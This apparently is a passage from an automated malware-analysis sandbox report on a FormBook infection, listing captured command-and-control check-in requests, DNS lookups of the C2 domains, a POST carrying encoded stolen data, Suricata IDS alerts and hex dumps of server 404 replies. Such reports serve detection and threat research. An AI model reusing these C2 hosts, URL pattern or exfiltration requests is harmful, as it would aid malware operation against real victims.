Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.liangyuen528.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?wP=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&fPh4U=MJo4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 207Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 77 50 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38 Data Ascii: wP=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54851 -> 91.195.240.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54829 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54855 -> 15.197.172.60:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54863 -> 195.110.124.133:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54834 -> 52.25.92.0:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54867 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54873 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54859 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54839 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:54845 -> 85.159.66.93:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 11:00:40 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 12 Aug 2024 11:01:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 12 Aug 2024 11:01:12 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 12 Aug 2024 11:01:15 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 12 Aug 2024 11:01:17 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:13 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:16 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:18 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' 